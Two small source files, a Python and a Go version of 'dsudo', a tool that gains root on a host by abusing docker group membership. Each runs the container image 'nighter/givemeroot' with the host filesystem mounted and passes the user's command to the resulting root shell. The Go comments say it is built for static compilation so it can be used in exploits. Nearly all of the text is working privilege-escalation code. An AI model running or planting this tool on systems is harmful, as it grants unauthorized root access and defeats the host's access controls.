File: tools/misc/dsudo.py
#!/usr/bin/env python2
# python implementation of dsudo. This tool is inspired of sudo
# it executes command as root if you are part of the docker group.

import pexpect
import sys
import os

if len(sys.argv) < 2:
    print('dsudo <command>')
    sys.exit(0)

command = ' '.join(sys.argv[1:])

child = pexpect.spawn ('docker run --rm -v /:/mnt -i -t nighter/givemeroot')
child.timeout = 4

try:
    child.expect('sh-4.4#.*')
except:
    print("You need to be in docker group to have permissions on running docker.")
    sys.exit(0)

child.sendline('%s' % command)

try:
    child.expect('sh-4.4#.*')
except:
    print("You need to be in docker group to have permissions on running docker.")
    sys.exit(0)

child.sendline('end')
b=child.expect(['end'])
if b==0:
    print('\n'.join(str(child.before).split('\n')[1:-1]))

File: tools/go/dsudo.go
// dsudo
//
// dsudo application is inspired of sudo, it can execute commands as root
// by abuse docker. You need to be part of the docker group for this to work.
// Note right now there is no output from this command for that use the python implementation
// This one was made so it can be compiled static and be used in exploits.
// nighter - http://nighter.se
package main

import (
	"fmt"
	"os"

	gexpect "github.com/ThomasRooney/gexpect"
)

func main() {

	if len(os.Args) < 2 {
		fmt.Fprintf(os.Stderr, "Usage: dsudo <command>\n")
		os.Exit(1)
	}

	// This could be done cleaner but
	// as I'm a golang noob.
	command := ""
	for _, char := range os.Args[1:] {
		command += char + " "
	}

	child, err := gexpect.Spawn("docker run --rm -v /:/mnt -i -t nighter/givemeroot")
	if err != nil {
		panic(err)
	}

	child.Expect("sh-4.4#")
	child.SendLine(command)
	msg, _ := child.ReadLine()
	fmt.Printf("%s", msg)
	child.Close()
}
